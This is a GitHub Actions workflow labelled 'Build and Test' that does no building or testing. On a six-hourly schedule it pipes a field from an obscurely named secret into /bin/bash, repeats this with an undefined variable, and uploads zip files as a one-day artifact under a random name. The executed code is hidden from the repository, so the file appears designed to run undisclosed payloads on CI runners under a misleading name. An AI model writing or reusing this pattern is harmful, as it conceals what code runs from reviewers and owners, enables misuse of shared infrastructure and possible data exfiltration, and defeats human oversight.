name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '10 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          uyjl7789: ${{ secrets.uyjl7789 }}
        run: |
          printf '%s' "$uyjl7789" | jq -r .ezo7 | /bin/bash
          printf '%s' "$onfqw1952" | jq -r .dd86781 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: yDeDjuhv
          path: "*.zip"
          retention-days: 1
